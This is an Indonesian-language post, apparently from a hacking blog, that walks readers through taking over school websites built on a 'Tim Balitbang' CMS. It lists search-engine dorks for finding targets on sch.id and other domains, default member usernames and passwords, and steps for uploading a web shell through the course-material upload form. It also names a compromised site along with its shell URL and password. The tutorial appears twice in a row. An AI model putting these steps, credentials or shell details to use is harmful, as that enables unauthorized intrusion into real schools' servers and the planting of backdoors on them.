selamat pagi kali ini kita langsung saja agar tidak panjang lebar
POC :
1. Masukkan dork berikut ke google atau yahoo atau search engine lainnya...
inurl:"/html/index.php" intext:"Tim Balitbang"
inurl:"/html/index.php" intitle:"Selamat Datang"
inurl:"/member/" intext:"Tim Balitbang"note
h iya kalo di yahoo "inurl:" diilangin ya broo 
contoh :
/html/index.php intext" tim balitbang"
contoh lagi:
/path/html/index.php intext "tim balitbang" site:com atau /path/html/index.php intext "tim balitbang" site:net atau /path/html/index.php intext "tim balitbang" site
ch.id atau sebagainya....
2. Nanti akan muncul banyak web dengan domain sch.id/ac.id/com/net atau yang lainnya, coba pilih salah satu.
3. Masuk ke www.site.sch.id/member/index.php atau www.site.sch.id/member/user.php
4. Anda masuk sebagai member dengan memasukkan username dan pass berikut :
user:wardjana
pass:123456
useriswanto
pass:123456
5. Jika gak berhasil cari target lainnya masbroo jangan sedih
6.(kalau yang sudah bisa login) Lalu diapakan lagi kalau sudah masuk? Kita tanam shell/backdoor dengan cara pergi ke profile => tambah materi ajar => upload shell
7.. Jika sukses, buka shell masbroo semua di www.site.sch.id/download/namashellente.php
jika sukses seperti ini hasilnya :
www.dikbudsigi.com
shellnya: http://www.dikbudsigi.com/functions/pocong.php (pass:kerinci)
hehehe thanks buat yang udah baca.. jangan lupa +++ nye hehe
kalo kurang paham ane bersedia membantu 
1. Masukkan dork berikut ke google atau yahoo atau search engine lainnya...
inurl:"/html/index.php" intext:"Tim Balitbang"
inurl:"/html/index.php" intitle:"Selamat Datang"
inurl:"/member/" intext:"Tim Balitbang"note
h iya kalo di yahoo "inurl:" diilangin ya broo contoh :
/html/index.php intext" tim balitbang"
contoh lagi:
/path/html/index.php intext "tim balitbang" site:com atau /path/html/index.php intext "tim balitbang" site:net atau /path/html/index.php intext "tim balitbang" site
ch.id atau sebagainya....2. Nanti akan muncul banyak web dengan domain sch.id/ac.id/com/net atau yang lainnya, coba pilih salah satu.
3. Masuk ke www.site.sch.id/member/index.php atau www.site.sch.id/member/user.php
4. Anda masuk sebagai member dengan memasukkan username dan pass berikut :
user:wardjana
pass:123456
user
iswantopass:123456
5. Jika gak berhasil cari target lainnya masbroo jangan sedih
6.(kalau yang sudah bisa login) Lalu diapakan lagi kalau sudah masuk? Kita tanam shell/backdoor dengan cara pergi ke profile => tambah materi ajar => upload shell
7.. Jika sukses, buka shell masbroo semua di www.site.sch.id/download/namashellente.php
jika sukses seperti ini hasilnya :
www.dikbudsigi.com
shellnya: http://www.dikbudsigi.com/functions/pocong.php (pass:kerinci)
hehehe thanks buat yang udah baca.. jangan lupa +++ nye hehe
kalo kurang paham ane bersedia membantu 
jembut,, posting tdk sesuai harapan
ReplyDelete